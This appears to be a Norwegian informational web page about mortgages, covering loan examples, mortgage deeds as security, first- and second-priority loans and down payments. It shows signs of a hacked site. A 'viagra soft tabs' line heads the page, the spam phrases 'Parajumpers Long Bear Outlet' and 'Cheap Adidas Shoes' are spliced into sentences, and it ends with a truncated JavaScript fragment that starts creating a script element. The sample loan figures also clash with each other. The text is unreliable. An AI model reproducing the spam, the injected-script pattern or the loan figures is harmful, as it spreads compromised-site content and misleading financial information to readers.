viagra soft tabs

Informasjon om boliglån. Finn ut alt du skal vite om boliglån

Långivere Eff. rente Rating
Eks: 65.000 o/5 år, 16,84%, etb 650. Tot: 94150.
16,84 % Søk lån
Eks: 65k o/5 år, 27,5%, etb 975. Tot: 94308.
16,93 % Søk lån

Grunnleggende informasjon

Boliglån er lån man vanligvis trenger når man skal kjøpe et hus eller et sted å bo. De er tilgjengelige hos både store banker og mindre långivere, avhengig av hvor mye penger man behøver å låne. Det er vanligvis en veldig stor beslutning å ta opp et boliglån. Det kan være vanskelig å finne et boliglån hvor man kan låne så mye man trenger men som samtidig kan Parajumpers Long Bear Outlet tilbake betales uten problemer. Én ting som kan hjelpe i beslutningsprosessen er at man lærer litt mer om boliglån og hva det betyr å søke om et boliglån. Vi håper denne informasjonen om boliglån kan hjelpe til og tjene som en slags veiledning i beslutningsprosessen.
Når man tar opp et boliglån, ønsker långivere vanligvis sikkerhet i form av et pantebrev (Link til ”Leksikon”) som kan fås hos den lokale registreringsmyndigheten. Et pantebrev er en eierandel i huset på et visst beløp. Långivere tar disse pantebrevene som en slags sikkerhet for deres boliglån, og er derfor berettiget til beløpet som er angitt på selve pantebrevet dersom huset kommer til å bli solgt på en auksjon.

Låneprosessen

Når man tar et boliglån det er ting som dårlig kredittevne, arbeidsledighet, langvarig sykdom og ubetalte gjeld som kan føre til problemer. Det er, med andre ord, usikkert om långivere vil innvilge et boliglån hvis man befinner seg i én av situasjonene som er nevnt ovenfor.

Et boliglån kan enten ha en fast eller en flytende rente og det er svært viktig å sammenligne renter hos ulike långivere og andre detaljer som amortisering og forsikring. Regelen er generelt sådan at faste renter for en kortere periode (3 måneder) ofte har en høyere rente enn for lengre perioder (3 år), men dette kan også variere. Det som alltid gjelder er at amortisering og renter betales regelmessig inntil det hele boliglånet er nedbetalt.

Deling av boliglån

Normalt deles et boliglån i tre deler. Disse delene varierer og det er viktig å forstå slik at man vet hva det er å forvente. De tre delene er kalt: førsteprioritets pantelån, annenprioritets pantelån og forskuddsbetaling.

Førsteprioritets pantelån er den største delen av et boliglån og dekker opptil 85% av det totale lånebeløpet. Det er en fordel å ha et førsteprioritets pantelån som dekker mesteparten av lånet siden det er mest sikkert – selve eiendommen. Det er derfor billigere fordi långiverne ikke behøver å bekymre seg om boliglån nedbetalingen. Med andre ord, vil de få tilbake sine lånte penger uansett.

Annenprioritets pantelån dekker ofte mellom 10-15% av det totale lånebeløpet. Denne parten har ingen forsikring og er derfor mer risikabel for långivere og dermed dyrere for deg. Dvs. at den beste løsningen er å ha annenprioritets pantelån så lille som mulig samt at det skal tilbakebetales så raskt som mulig.

Forskuddsbetaling (eller depositum) er en vanlig del, men finnes ikke alltid når man tar opp et boliglån. Hovedformålet med forskuddsbetalingen er å vise långiveren at man er seriøs og har evnen til å håndtere ens betalinger – långiveren ønsker å føle seg trygg. Et depositum er ofte rundt 10%. Det er imidlertid ingen Cheap Adidas Shoes lover som sier at man må regne med en forskuddsbetaling når man skal ta opp et boliglån. Dette betyr at man kan unngå å betale noe som helst depositum dersom man kjøper en eiendom til en svært rimelig pris.

var d=document;var s=d.createElement(‘script’); } else {